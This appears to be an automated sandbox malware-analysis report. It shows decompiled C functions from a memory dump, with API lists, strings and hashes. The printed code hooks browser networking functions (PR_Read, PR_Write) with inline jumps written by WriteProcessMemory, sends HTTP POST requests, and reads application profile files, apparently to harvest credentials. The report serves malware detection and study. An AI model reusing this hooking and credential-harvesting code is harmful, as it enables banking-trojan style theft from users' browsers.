						_t21 = "Connection: close\r\n";
						_pop(0);
					} else {
						_t21 = 0;
					}
					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
						L14:
						InternetCloseHandle(_t32);
						goto L15;
					} else {
						_a20 = _a20 & 0x00000000;
						_a8 = 4;
						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
							goto L14;
						} else {
							return _t32;
						}
					}
				}
			}

0x00408b74
0x00408b78
0x00408b7d
0x00408b7f
0x00408b7f
0x00408b88
0x00408b8a
0x00408b8a
0x00408b93
0x00408b98
0x00408b9a
0x00408b9a
0x00408bbb
0x00408bbf
0x00408c1f
0x00000000
0x00408bc1
0x00408bc3
0x00408bcb
0x00408bcd
0x00408bd2
0x00408bc5
0x00408bc5
0x00408bc7
0x00408be4
0x00408c18
0x00408c19
0x00000000
0x00408be6
0x00408be6
0x00408bfa
0x00408c09
0x00000000
0x00408c14
0x00000000
0x00408c14
0x00408c09
0x00408be4

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00422000,8404F700,00000000), ref: 00408BB5
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00408BDC
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 00408C01
InternetCloseHandle.WININET(00000000), ref: 00408C19

Strings

GET, xrefs: 00408B9A, 00408BB1
Connection: close, xrefs: 00408BCD, 00408BDA
POST, xrefs: 00408B93
HTTP/1.1, xrefs: 00408BA9

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
String ID: Connection: close$GET$HTTP/1.1$POST
API String ID: 3080274660-1621676011
Opcode ID: 2ac2dbd981a47687df86cad1dd4c579d877e7be7e6493cb2d8c37352798f4162
Instruction ID: e4681c177468f23ad7595186a72d33fcd041a771e0c44f6a05d870dbf4a182c4
Opcode Fuzzy Hash: 2ac2dbd981a47687df86cad1dd4c579d877e7be7e6493cb2d8c37352798f4162
Instruction Fuzzy Hash: 801193712452096BEF114E50DD85FAB3AA8DB44354F14803AFF01F62E0DBB8E95087EC

Uniqueness

Uniqueness Score: -1.00%

Function 00404F4F, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00404F4F(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
				void* __ebx;
				_Unknown_base(*)()* _t4;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;

				_t12 = __edx;
				_t11 = __ecx;
				 *0x422360 = GetProcAddress(__edi, "PR_OpenTCPSocket");
				 *0x422370 = GetProcAddress(__edi, "PR_Close");
				 *0x422380 = GetProcAddress(__edi, "PR_Read");
				_t4 = GetProcAddress(__edi, "PR_Write");
				_push(0x422360);
				_t9 = 4;
				 *0x422390 = _t4;
				_t10 = E00404C87(_t9, _t11, _t12);
				if(_t10 != 0) {
					E00414818(__edi,  *0x422368,  *0x422378,  *0x422388,  *0x422398);
				}
				return _t10;
			}

0x00404f4f
0x00404f4f
0x00404f65
0x00404f72
0x00404f7f
0x00404f84
0x00404f86
0x00404f8d
0x00404f8e
0x00404f98
0x00404f9c
0x00404fb8
0x00404fb8
0x00404fc1

APIs

GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 00404F5D
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 00404F6A
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 00404F77
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 00404F84

Part of subcall function 00404C87: VirtualAllocEx.KERNEL32(000000FF,00000000,00000034,00003000,00000040,00000000,77E49EB0,?,?,00404F4D,00422020,00000000,00412A76), ref: 00404CBE

Part of subcall function 00414818: InitializeCriticalSection.KERNEL32(00423E40,74B04EE0,00404FBD,00422360), ref: 0041482E
Part of subcall function 00414818: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0041486A
Part of subcall function 00414818: GetProcAddress.KERNEL32(PR_SetError), ref: 0041487C
Part of subcall function 00414818: GetProcAddress.KERNEL32(PR_GetError), ref: 0041488E

Strings

PR_OpenTCPSocket, xrefs: 00404F57
PR_Write, xrefs: 00404F79
PR_Close, xrefs: 00404F5F
PR_Read, xrefs: 00404F6C

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCriticalInitializeSectionVirtual
String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
API String ID: 1833644279-3954199073
Opcode ID: be42e31a414a88592202dfd95c9b53a8bbc0c61af8e331d4aa6df0de539697b6
Instruction ID: 32d0d329873543ef2d4474a4a6536f49c38d4ac10ab500e981e85ec4bd17e914
Opcode Fuzzy Hash: be42e31a414a88592202dfd95c9b53a8bbc0c61af8e331d4aa6df0de539697b6
Instruction Fuzzy Hash: 34F03071B813147BCB219B756D06D967FACF796B64398043BB904A71B0C7FE0442DA5C

Uniqueness

Uniqueness Score: -1.00%

Function 0041B69B, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 367
timenetworkCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0041B69B(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, signed int* _a12) {
				char _v540;
				char _v800;
				char _v804;
				char _v860;
				struct _SYSTEMTIME _v876;
				char _v900;
				signed int _v968;
				signed int _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				char* _v992;
				char _v996;
				void* _v1008;
				struct _SYSTEMTIME _v1028;
				signed int _v1032;
				short _v1036;
				signed short* _v1040;
				signed int _v1044;
				intOrPtr* _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				char _v1068;
				intOrPtr _v1072;
				char _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t158;
				signed int _t159;
				intOrPtr _t160;
				signed int _t168;
				void* _t188;
				void* _t199;
				signed int _t211;
				signed int _t215;
				signed int _t218;
				signed char _t222;
				signed int _t224;
				void* _t227;
				void* _t228;
				signed int _t229;
				signed int _t230;
				signed int _t240;
				void* _t242;
				signed int _t250;
				intOrPtr* _t254;
				signed int _t255;
				intOrPtr _t258;
				short* _t261;
				void* _t280;
				intOrPtr* _t286;
				signed int _t291;
				long _t294;
				signed short* _t296;
				signed short* _t298;
				signed int _t301;
				intOrPtr* _t303;
				signed int _t307;
				void* _t309;

				_t309 = (_t307 & 0xfffffff8) - 0x424;
				_v1032 = _v1032 & 0x00000000;
				if(__eax == 0) {
					L52:
					asm("sbb eax, eax");
					return  ~0x00000000;
				} else {
					_t286 = __ecx + 0x10;
					_v1048 = _t286;
					_v1028.wDayOfWeek = __eax;
					do {
						_t258 =  *_t286;
						_t279 =  *(_t286 - 0x10) >> 0x0000000a & 0x00000008;
						_v1028.wHour = _t279;
						if(_t258 == 0) {
							_t254 = _a8;
							L6:
							_t259 =  *(_t286 + 4);
							_v1052 = _v1052 & 0x00000000;
							_v1064 = _v1064 & 0x00000000;
							_t158 =  *((intOrPtr*)(_t286 + 8)) + _t259;
							_v1028.wSecond = _t158;
							if(_t259 >= _t158) {
								L35:
								_t159 =  *(_t286 - 0x10);
								_t294 = 0;
								if((_t159 & 0x00000008) != 0 && _v1052 != 0) {
									if((_t159 & 0x00000200) == 0) {
										_t255 = E004070C5(_t159 | 0xffffffff, 0, _a4);
										__eflags = _t255;
										if(_t255 != 0) {
											_t188 = 9;
											E00405B00(_t188,  &_v996);
											_push(_v1052);
											E0040ED2D(_t259, _t279, __eflags, 0xc9, _t255, 0,  &_v996, _t255);
											_t309 = _t309 + 0x18;
											E00406E85(_t255);
										}
									} else {
										_t280 = 0x3c;
										E00406F38( &_v996,  &_v996, 0, _t280);
										_v992 =  &_v800;
										_v1008 = _t280;
										_v988 = 0x103;
										if(InternetCrackUrlA(_a4, 0, 0,  &_v1008) == 1 && _v992 > 0) {
											GetSystemTime( &_v1028);
											_t306 =  &_v876;
											_t199 = 8;
											E00405B00(_t199,  &_v876);
											_push(_v1028.wDay & 0x0000ffff);
											_push(_v1028.wMonth & 0x0000ffff);
											_push((_v1028.wYear & 0x0000ffff) - 0x7d0);
											_push( &_v804);
											E00407B78( &_v876, 0x104,  &_v540, _t306);
											_t309 = _t309 + 0x14;
											E0040EB83(_t259, 0x104, 2, 0,  &_v540, _v1068, _v1080);
											_t286 = _v1084;
										}
									}
									E00406E85(_v1052);
									_t294 = 0;
								}
								if( *((intOrPtr*)(_t286 - 4)) != _t294) {
									if(( *(_t286 - 0x10) & 0x00000010) == 0) {
										EnterCriticalSection(0x423fe0);
										E00406E85( *0x423ff8);
										_t168 = E004072E3(E00406E85( *0x423ffc) | 0xffffffff,  *((intOrPtr*)(_t286 - 0xc)));
										 *0x423ff8 = _t168;
										__eflags = _t168 | 0xffffffff;
										 *0x423ffc = E004072E3(_t168 | 0xffffffff,  *((intOrPtr*)(_t286 - 4)));
										LeaveCriticalSection(0x423fe0);
										goto L51;
									}
									E00413277( &_v860, _t259, 1,  &_v996);
									if(E0040812A( &_v900,  *((intOrPtr*)(_t286 - 4)), E004079C2( *((intOrPtr*)(_t286 - 4)))) == 0) {
										goto L51;
									}
									_t261 =  &_v860;
									do {
										E004071ED( *((intOrPtr*)(_t309 + _t294 + 0xb8)), _t261);
										_t294 = _t294 + 1;
										_t261 = _t261 + 4;
									} while (_t294 < 0x10);
									 *_t261 = 0;
									GetLocalTime( &_v876);
									E0040B104(_t261,  &_v996,  &_v860, 3,  &_v876, 0x10);
								}
								goto L51;
							} else {
								goto L9;
								L13:
								_t279 =  *_t211 & 0x0000ffff;
								if(_t279 != 4) {
									_t259 = _t211 + 4;
									_t218 = E0041A9C1(_v1028.wHour, _t211 + 4, 0,  &_v1056, _t279 - 4,  *_t254 + _v1060,  *_a12 - _v1060);
									__eflags = _t218;
									if(_t218 == 0) {
										L33:
										if(_v1028.wYear < _v1028.wSecond) {
											_t259 = _v1028.wYear;
											L9:
											_t211 = ( *_t259 & 0x0000ffff) + _t259;
											_t296 = ( *_t211 & 0x0000ffff) + _t211;
											_v1028.wYear = _t296 + ( *_t296 & 0x0000ffff);
											_t279 =  *_t259 & 0x0000ffff;
											_v1036 = _t259;
											_v1044 = _t211;
											_v1040 = _t296;
											if(( *_t259 & 0x0000ffff) != 4) {
												goto L11;
											} else {
												_v1060 = _v1060 & 0x00000000;
												goto L13;
											}
										}
										_t286 = _v1048;
										goto L35;
									}
									__eflags =  *_v1036 - 4;
									_t298 = _v1040;
									if( *_v1036 != 4) {
										_t54 =  &_v1056;
										 *_t54 = _v1056 + _v1060;
										__eflags =  *_t54;
									} else {
										_v1060 = _v1056;
									}
									L22:
									_t259 = _v1056 - _v1060;
									_t222 =  *(_v1048 - 0x10);
									_t291 = ( *_t298 & 0x0000ffff) - 4;
									_v1044 = _t259;
									if((_t222 & 0x00000004) == 0) {
										__eflags = _t222 & 0x00000008;
										if((_t222 & 0x00000008) != 0) {
											_t224 = E00406E10(_t259 + _t291 + _v1064 + 2,  &_v1052);
											__eflags = _t224;
											if(_t224 != 0) {
												_t301 = _v1052;
												__eflags = _t291;
												if(_t291 != 0) {
													E00406EC1(_v1064 + _t301,  &(_v1040[2]), _t291);
													_t84 =  &_v1076;
													 *_t84 = _v1076 + _t291;
													__eflags =  *_t84;
												}
												_t279 = _v1044;
												_t227 = E00406EC1(_v1064 + _t301,  *_t254 + _v1060, _t279);
												_t259 = _v1060;
												__eflags =  *(_t259 - 0x10) & 0x00000100;
												if(( *(_t259 - 0x10) & 0x00000100) == 0) {
													_t228 = E0040BAAB(_t227, _t279);
													_t95 =  &_v1068;
													 *_t95 = _v1068 + _t228;
													__eflags =  *_t95;
													_t254 = _a8;
												} else {
													_v1064 = _v1064 + _t279;
												}
												_t229 = _v1064;
												 *((char*)(_t229 + _t301)) = 0xa;
												_t230 = _t229 + 1;
												__eflags = _t230;
												_v1064 = _t230;
												 *((char*)(_t230 + _t301)) = 0;
											}
										}
									} else {
										_v1036 =  *_a12 - _t259 + _t291;
										_t240 = E00406E55( *_a12 - _t259 + _t291);
										_v1044 = _t240;
										if(_t240 != 0) {
											_t279 = _v1060;
											_t242 = E00406EC1(E00406EC1(_t240,  *_t254, _v1060) + _v1060,  &(_t298[2]), _t291);
											_t303 = _a12;
											_t259 =  *_t254 + _v1080;
											E00406EC1(_t242 + _t291 + _v1060,  *_t254 + _v1080,  *_t303 - _v1080);
											E00406E85( *_t254);
											_v1072 = _v1072 + 1;
											 *_t254 = _v1084;
											 *_t303 = _v1076;
										}
									}
									goto L33;
								}
								if( *_t259 != _t279) {
									_t250 = _v1060;
								} else {
									_t250 =  *_a12;
								}
								_v1056 = _t250;
								goto L22;
								L11:
								_t215 = E0041A9C1(_v1028.wHour, _t259,  &_v1060, 0, _t279 - 4,  *_t254,  *_a12);
								__eflags = _t215;
								if(_t215 == 0) {
									goto L33;
								}
								_t298 = _v1040;
								_t211 = _v1044;
								_t259 = _v1036;
								goto L13;
							}
						}
						_v996 = 0x2a3f;
						_v992 = _t258;
						_t160 = E004079C2(_t258);
						_t254 = _a8;
						_v988 = _t160;
						_v984 =  *_t254;
						_t279 = _t279 | 0x00000012;
						_v980 =  *_a12;
						_v968 = _t279;
						if(E00407E09( &_v996) != 0) {
							goto L6;
						}
						L51:
						_t286 = _t286 + 0x1c;
						_t150 =  &(_v1028.wDayOfWeek);
						 *_t150 = _v1028.wDayOfWeek - 1;
						_v1048 = _t286;
					} while ( *_t150 != 0);
					goto L52;
				}
			}

0x0041b6a1
0x0041b6a7
0x0041b6b1
0x0041bb3c
0x0041bb43
0x0041bb4c
0x0041b6b7
0x0041b6b7
0x0041b6ba
0x0041b6be
0x0041b6c2
0x0041b6c5
0x0041b6ca
0x0041b6cd
0x0041b6d3
0x0041b715
0x0041b718
0x0041b718
0x0041b71e
0x0041b723
0x0041b728
0x0041b72a
0x0041b730
0x0041b932
0x0041b932
0x0041b935
0x0041b939
0x0041b94e
0x0041ba13
0x0041ba15
0x0041ba17
0x0041ba1f
0x0041ba20
0x0041ba25
0x0041ba35
0x0041ba3a
0x0041ba3e
0x0041ba3e
0x0041b954
0x0041b956
0x0041b95e
0x0041b96a
0x0041b978
0x0041b97c
0x0041b98d
0x0041b9a2
0x0041b9aa
0x0041b9b1
0x0041b9b2
0x0041b9bc
0x0041b9c2
0x0041b9cd
0x0041b9d5
0x0041b9e5
0x0041b9ea
0x0041b9fc
0x0041ba01
0x0041ba01
0x0041b98d
0x0041ba47
0x0041ba4c
0x0041ba4c
0x0041ba51
0x0041ba5b
0x0041bae8
0x0041baf4
0x0041bb0a
0x0041bb0f
0x0041bb17
0x0041bb20
0x0041bb25
0x00000000
0x0041bb25
0x0041ba6f
0x0041ba8d
0x00000000
0x00000000
0x0041ba93
0x0041ba9a
0x0041baa1
0x0041baa6
0x0041baa7
0x0041baaa
0x0041bab1
0x0041babc
0x0041badb
0x0041badb
0x00000000
0x0041b736
0x0041b736
0x0041b79b
0x0041b79b
0x0041b7a1
0x0041b7d4
0x0041b7db
0x0041b7e0
0x0041b7e2
0x0041b920
0x0041b928
0x0041b738
0x0041b73c
0x0041b73f
0x0041b744
0x0041b74b
0x0041b74f
0x0041b752
0x0041b756
0x0041b75a
0x0041b761
0x00000000
0x0041b763
0x0041b763
0x00000000
0x0041b763
0x0041b761
0x0041b92e
0x00000000
0x0041b92e
0x0041b7ec
0x0041b7f0
0x0041b7f4
0x0041b804
0x0041b804
0x0041b804
0x0041b7f6
0x0041b7fa
0x0041b7fa
0x0041b808
0x0041b813
0x0041b817
0x0041b81a
0x0041b81d
0x0041b823
0x0041b895
0x0041b897
0x0041b8ab
0x0041b8b0
0x0041b8b2
0x0041b8b4
0x0041b8b8
0x0041b8ba
0x0041b8cc
0x0041b8d1
0x0041b8d1
0x0041b8d1
0x0041b8d1
0x0041b8d7
0x0041b8e8
0x0041b8ed
0x0041b8f1
0x0041b8f8
0x0041b903
0x0041b908
0x0041b908
0x0041b908
0x0041b90c
0x0041b8fa
0x0041b8fa
0x0041b8fa
0x0041b90f
0x0041b913
0x0041b917
0x0041b917
0x0041b918
0x0041b91c
0x0041b91c
0x0041b8b2
0x0041b825
0x0041b82e
0x0041b832
0x0041b837
0x0041b83d
0x0041b843
0x0041b859
0x0041b85e
0x0041b86c
0x0041b874
0x0041b87b
0x0041b884
0x0041b888
0x0041b88e
0x0041b88e
0x0041b83d
0x00000000
0x0041b823
0x0041b7a6
0x0041b7af
0x0041b7a8
0x0041b7ab
0x0041b7ab
0x0041b7b3
0x00000000
0x0041b76a
0x0041b782
0x0041b787
0x0041b789
0x00000000
0x00000000
0x0041b78f
0x0041b793
0x0041b797
0x00000000
0x0041b797
0x0041b730
0x0041b6d5
0x0041b6dc
0x0041b6e0
0x0041b6e5
0x0041b6e8
0x0041b6ee
0x0041b6f7
0x0041b6fe
0x0041b702
0x0041b70d
0x00000000
0x0041b713
0x0041bb2b
0x0041bb2b
0x0041bb2e
0x0041bb2e
0x0041bb32
0x0041bb32
0x00000000
0x0041b6c2

APIs

InternetCrackUrlA.WININET(?,?,?,00000000), ref: 0041B984
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 0041B9A2
GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?,-00423E5C,?,?), ref: 0041BABC
EnterCriticalSection.KERNEL32(00423FE0,-00423E5C,?,?), ref: 0041BAE8
LeaveCriticalSection.KERNEL32(00423FE0,?,?), ref: 0041BB25

Strings

?*, xrefs: 0041B6D5
?B, xrefs: 0041BAE2

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
String ID: ?*$?B
API String ID: 2400141425-740349515
Opcode ID: f15823de3769cf40323cf1d45a756d3385d2f647c5bc43e1bb7dd426b2c15765
Instruction ID: 8f6f80360856d367ccd0f6ec72bfea998410952d63b0662bca32a2657afa8ceb
Opcode Fuzzy Hash: f15823de3769cf40323cf1d45a756d3385d2f647c5bc43e1bb7dd426b2c15765
Instruction Fuzzy Hash: 33E19CB15083019FD710DF69C880AABB7E5FF88314F04492EF895A7391D738E945CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004184D9, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004184D9(char* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v64;
				char _v84;
				char _v108;
				char _v152;
				char _v180;
				char _v252;
				short _v766;
				char _v772;
				short _v1292;
				void* __edi;
				void* __esi;
				void* _t46;
				void* _t48;
				void* _t53;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t68;
				void* _t70;
				void* _t75;
				WCHAR* _t100;
				signed int _t101;
				WCHAR* _t103;
				char* _t108;
				intOrPtr _t109;
				void* _t112;
				intOrPtr _t125;

				_t99 = __edx;
				_t98 = __ecx;
				E00406F38( &_v12,  &_v12, 0, 8);
				_t46 = 0x6a;
				E00405B00(_t46,  &_v252);
				_t48 = 0x6b;
				E00405B00(_t48,  &_v108);
				_t100 =  &_v772;
				_t53 = E0040AFA9(0x80000001, _t98, _t100,  &_v252,  &_v108, 0x104);
				if(_t53 != 0xffffffff) {
					_t115 = _t53;
					if(_t53 != 0) {
						ExpandEnvironmentStringsW(_t100,  &_v1292, 0x104);
						E004182ED(_t99, _t115,  &_v1292,  &_v12);
						PathRemoveFileSpecW( &_v1292);
					}
				}
				_t101 = 0;
				if(_v8 != 0) {
					L14:
					_t125 = _v8;
					goto L15;
				} else {
					_t57 = 0x6d;
					E00405B00(_t57,  &_v64);
					_t59 = 0x6e;
					E00405B00(_t59,  &_v152);
					_t108 =  &_v84;
					_t61 = 0x6f;
					E00405B00(_t61, _t108);
					_v24 =  &_v64;
					_v20 =  &_v152;
					_v40 = 0x24;
					_v36 = 0x1a;
					_v32 = 0x26;
					_v28 = 0x23;
					_v16 = _t108;
					do {
						_t109 =  *((intOrPtr*)(_t112 + _t101 * 4 - 0x24));
						__imp__SHGetFolderPathW(0, _t109, 0, 0,  &_v772);
						if(0 == 0) {
							_t118 = _t109 - 0x24;
							if(_t109 == 0x24) {
								E004182AB(_t118,  &_v772,  &_v12, 0);
								_v766 = 0;
							}
							_t99 =  &_v24;
							_t98 =  &_v772;
							E0040C5AE( &_v772,  &_v24, 0, 3, 2, E00418490,  &_v12, 0, 0, 0);
						}
						_t101 = _t101 + 1;
					} while (_t101 < 4);
					if(_v8 != 0) {
						L15:
						if(_t125 <= 0) {
							return E00406E85(_v12);
						}
						_push(0xcb);
						return E00416CBC(_t99, _v12, 0x70);
					}
					_t68 = 0x6a;
					E00405B00(_t68,  &_v180);
					_t70 = 0x6c;
					E00405B00(_t70,  &_v64);
					_t103 =  &_v772;
					_t75 = E0040AFA9(0x80000001, _t98, _t103,  &_v180,  &_v64, 0x104);
					if(_t75 != 0xffffffff) {
						_t124 = _t75;
						if(_t75 != 0) {
							ExpandEnvironmentStringsW(_t103,  &_v1292, 0x104);
							E004182AB(_t124,  &_v1292,  &_v12, 1);
						}
					}
					goto L14;
				}
			}

0x004184d9
0x004184d9
0x004184ed
0x004184fa
0x004184fb
0x00418505
0x00418506
0x0041851b
0x00418526
0x0041852e
0x00418530
0x00418532
0x0041853f
0x00418550
0x0041855c
0x0041855c
0x00418532
0x00418562
0x00418567
0x00418687
0x00418687
0x00000000
0x0041856d
0x00418572
0x00418573
0x00418580
0x00418581
0x00418588
0x0041858b
0x0041858c
0x00418594
0x0041859d
0x004185a2
0x004185a9
0x004185b0
0x004185b7
0x004185be
0x004185c1
0x004185c1
0x004185d2
0x004185da
0x004185dc
0x004185df
0x004185ed
0x004185f4
0x004185f4
0x0041860d
0x00418610
0x00418616
0x00418616
0x0041861b
0x0041861c
0x00418625
0x0041868b
0x0041868b
0x00000000
0x004186a2
0x00418690
0x00000000
0x00418698
0x0041862f
0x00418630
0x0041863a
0x0041863b
0x0041864b
0x00418656
0x0041865e
0x00418660
0x00418662
0x0041866f
0x00418682
0x00418682
0x00418662
0x00000000
0x0041865e

APIs

Part of subcall function 0040AFA9: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00413CB1,?,?,00000104,.exe,00000000), ref: 0040AFBE

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0041853F

Part of subcall function 004182ED: GetPrivateProfileStringW.KERNEL32 ref: 00418324
Part of subcall function 004182ED: StrStrIW.SHLWAPI(00000001,?), ref: 004183AC
Part of subcall function 004182ED: StrStrIW.SHLWAPI(00000001,?), ref: 004183BD
Part of subcall function 004182ED: GetPrivateProfileStringW.KERNEL32 ref: 004183D9
Part of subcall function 004182ED: GetPrivateProfileStringW.KERNEL32 ref: 004183F7

PathRemoveFileSpecW.SHLWAPI(?,?,?,?,00000000,00000001), ref: 0041855C

Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 004185D2
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000001), ref: 0041866F

Strings

$, xrefs: 004185A2
#, xrefs: 004185B7
&, xrefs: 004185B0

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$EnvironmentExpandPathStrings$FileFolderFreeHeapOpenRemoveSpec
String ID: #$$$&
API String ID: 1517737059-1941049543
Opcode ID: e581dc2a110ed528eb084725a70375682de48580ed23019dc1fff705474752ce
Instruction ID: 9d47f1990da3d837f279198adbd04c724eba6bbf34df87a64b458f68d2b7b92b
Opcode Fuzzy Hash: e581dc2a110ed528eb084725a70375682de48580ed23019dc1fff705474752ce
Instruction Fuzzy Hash: AF514D72E00218AADF10EBA5CC59FDF77BCEB04314F5005ABB509F7181DB78AA858B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6C1, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 108
injectionCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040B6C1(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, char _a8) {
				char _v8;
				DWORD* _v12;
				intOrPtr _v47;
				void _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t47;
				void* _t58;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				intOrPtr* _t66;
				long _t68;
				DWORD* _t69;
				void* _t71;

				_t63 = __edx;
				_t61 = __ecx;
				_t58 = __eax;
				_t69 = 0;
				_v12 = 0;
				if(E0040B67C(_a4) < 0x1e) {
					L18:
					return _v12;
				}
				_t3 =  &_v8; // 0x412a76
				if(VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40, _t3) == 0) {
					goto L18;
				}
				E00406F38( &_v48,  &_v48, 0xffffff90, 0x23);
				if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
					L17:
					_t30 =  &_v8; // 0x412a76
					_t31 =  &_v8; // 0x412a76
					VirtualProtectEx(0xffffffff, _a4, 0x1e,  *_t31, _t30);
					goto L18;
				} else {
					_t66 =  &_v48;
					_push(0);
					_push(_t66);
					while(1) {
						_t47 = E0041D910(_t58, _t61, _t63, _t66, _t69);
						if(_t47 == 0xffffffff) {
							break;
						}
						_t69 = _t69 + _t47;
						if(_t69 > 0x1e) {
							L16:
							goto L17;
						}
						_t61 =  *_t66;
						if(_t61 == 0xe9 || _t61 == 0xe8) {
							if(_t47 == 5) {
								_t10 =  &_a8; // 0x422020
								 *((intOrPtr*)(_t66 + 1)) =  *((intOrPtr*)(_t66 + 1)) + _a4 -  *_t10;
							}
						}
						_push(0);
						if(_t69 >= 5) {
							_t16 =  &_a8; // 0x422020
							_t17 = _t69 + 5; // 0x5
							_t68 = _t17;
							 *((intOrPtr*)(_t71 + _t69 - 0x2b)) = _a4 -  *_t16 - 5;
							_t21 =  &_a8; // 0x422020
							 *((char*)(_t71 + _t69 - 0x2c)) = 0xe9;
							if(WriteProcessMemory(0xffffffff,  *_t21,  &_v48, _t68, ??) != 0) {
								_t62 = _a4;
								_v48 = 0xe9;
								_v47 = _t58 - _t62 - 5;
								E00404C22(_t62, _a8);
								if(WriteProcessMemory(0xffffffff, _t62,  &_v48, 5, 0) != 0) {
									_v12 = _t68;
								}
							}
							goto L16;
						}
						_t66 = _t71 + _t69 - 0x2c;
						_push(_t66);
					}
					goto L16;
				}
			}

0x0040b6c1
0x0040b6c1
0x0040b6c9
0x0040b6ce
0x0040b6d0
0x0040b6db
0x0040b7d5
0x0040b7db
0x0040b7db
0x0040b6e1
0x0040b6f6
0x00000000
0x00000000
0x0040b704
0x0040b71d
0x0040b7c1
0x0040b7c1
0x0040b7c5
0x0040b7cf
0x00000000
0x0040b723
0x0040b724
0x0040b727
0x0040b72a
0x0040b75e
0x0040b75e
0x0040b766
0x00000000
0x00000000
0x0040b72d
0x0040b732
0x0040b7c0
0x00000000
0x0040b7c0
0x0040b738
0x0040b73d
0x0040b747
0x0040b74c
0x0040b74f
0x0040b74f
0x0040b747
0x0040b752
0x0040b757
0x0040b76d
0x0040b770
0x0040b770
0x0040b776
0x0040b77f
0x0040b782
0x0040b793
0x0040b795
0x0040b7a0
0x0040b7a4
0x0040b7a7
0x0040b7bb
0x0040b7bd
0x0040b7bd
0x0040b7bb
0x00000000
0x0040b793
0x0040b759
0x0040b75d
0x0040b75d
0x00000000
0x0040b768

APIs

Part of subcall function 0040B67C: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000008,?,?,?,?,00404BC2,00000000,00000000,00000034,00404F4D,00422020,00000000), ref: 0040B691

VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,v*A,-00000008,00000034,?,?,00404CE3,?,00000000,?,?,00404F4D,00422020), ref: 0040B6EE
ReadProcessMemory.KERNEL32(000000FF,00000000,?,0000001E,00000000,?,00000090,00000023,?,?,00404CE3,?,00000000,?,?,00404F4D), ref: 0040B715
